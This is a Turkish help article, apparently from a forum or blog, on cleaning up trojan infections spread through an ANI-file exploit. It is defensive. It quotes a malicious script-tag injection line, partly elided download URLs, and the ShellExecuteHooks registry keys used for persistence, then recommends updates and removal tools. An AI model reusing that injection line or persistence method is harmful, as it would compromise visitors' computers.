Trojan (Truva Atı) Saldırıları İçin Önlemler
Kaspersky, Nod32, Avast, Norton gibi antiviruslerin guncel surumleri tarafindan korunan bilgisayarda herhangi bir Internet sayfasi acildiginda
- Exploit.Win32.IMG-ANI.k VIRUSU
- Trojan.DL.VBS.Agent.cpb VIRUSU
- Trojan-Downloader.JS VIRUSU
...
saldirilari Antivirus programlarinca surekli haber verilmekte ve onlenmektedir. Genel neden olarak:
(-1-)
Windows isletim sisteminin ani dosyalarini isleme acigi/zayifligindan Windows isletim sisteminde aktif olan exploit(worm)'dan kaynaklanip
bu dosyayi cagirarak
icerisinden http://9166.biz/.....111.exe bu binary dosyayi calistirarak aktif olmaktadir. Ziyaret edilen her web sayfasinin kaynak kodunun ilk satirina
<script language="javascript" src="http://web.123563.com/.....k.js"></script> satirini eklemekte, dil kodunu da Bati Avrupa (Windows) olarak degistirdiginden Turkce icerikli sayfalarda karakterler bozuk gorunmektedir.
(-2-)
Digeri ise http://day.91tg.net/.....xp.dll sayfasindan sistemimize C:\WINDOWS\winhelp.dll viruslu dosyasinin eklenmesidir.
Registry Kayitlarimizda asagidaki iki anahtara kaydedilip
HKLM\SOFTWARE\Classes\CLSID\ {6B3FCDC8-E5C7-477a-817E-72865A7758AE}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\ {6B3FCDC8-E5C7-477a-817E-72865A7758AE}
Her programda winhelp.dll dosyasinin calismasini saglamaktadir.
COZUM ONERILERI:
[-1-]
Bir saldirganin Windows tabanli sisteminizin guvenligini asmasina ve denetimini ele gecirmesine olanak verebilecek bir guvenlik sorunu guncellemesi kurabilirsiniz.
[-2-]
Bir saldirganin Microsoft Data Access Components kullanan Windows tabanli sisteminizin guvenligini uzaktan asmasina ve denetimini ele gecirmesine olanak verebilecek bir guvenlik sorunu guncellemesini kurabilirsiniz.
[-3-]
C:\WINDOWS\winhelp.dll dosyasini ve ilgili Registery anahtarlarini yedeklerinizi aldiktan sonra guvenli kipte silebilirsiniz.
[-4-]
Tum bunlara ragmen saldirilar devam etmekte oldugundan orjinal isletim sisteminizin guncelligini aksatmayaip Microsoft Windows Update yapabilirsiniz. Antiviruslerinizi guncel tutabilirsiniz.
[-5-]
Hijackthis - Trend Micro
Hijackthis mükemmel bir detektör ve temizleyici. Özellikle browser eklentileri konusunda çok başarılı. Sistemi analiz ederek sisteme sonradan eklenen tüm zararlı yazılımları bulur, tabii yararlı yazılımları da. Size kalan zararları seçip, temizletmek. Bunu da yapmanın kolay yolu var, Hijackthis yazılımının verdiği log dosyasını ana sayfasına giderek yapıştırıp analiz ettirmek ve hangi uygulamaların zararlı olduğu öğrenmek ve buna göre hareket etmek. Konfigürasyon bölümünde çalışan uygulamalar ile ilgili birçok detayı bulmak ve yönetmek de mümkündür (Gezginler.Net).
Hijackthis ile birlikte HijackReader programını kullanarak log'larınızı inceleyebilirsiniz.
Fixwareout
Fixwareout sisteminizdeki zararlı yazılımları ve sistemi yavaşlatan her türlü gereksiz detayı "fixleyip" ortadan kaldıran yararlı bir yazılımdır.Genel olarak Hijackthis programının görevini üstlenir ve ikisinin bir arada kullanılması daha yararlı olmaktadır.Boyutu 474kb'dır ve aynı zamanda ücretsizdir. Sistem kapanıp açıldıktan sonra çalışır.
AVZ Antiviral Toolkit
Kaspersky veri tabanın kullanan ve kurulumsuz kullanabileceğiniz bir tarama programıdır. Virüsleri, AdvWare, Spyware, Dialers/pornware, HackTool, Riskware'i tarar.
GÜRCAN ATAKÖK
Son birkaç gündür internet üzerinde dolaşan zararlı kullanıcıların bir numaralı belası olmaya başladı. Kaspersky tarafından "Trojan-Downloader.JS.Small.js" olarak tanımlanan zararlı, ağ üzerindeki bir PC'ye bulaşarak bu PC'yi sistemde Gateway olarak gösteriyor. Diğer bilgisayarlar ise Gateway olarak gördükleri bu PC üzerinden internete bağlanmaya çalışıyor. Tabi bu durumda virüs de internete bağlanmak isteyen PC'ye direkt olarak bulaşmış oluyor.
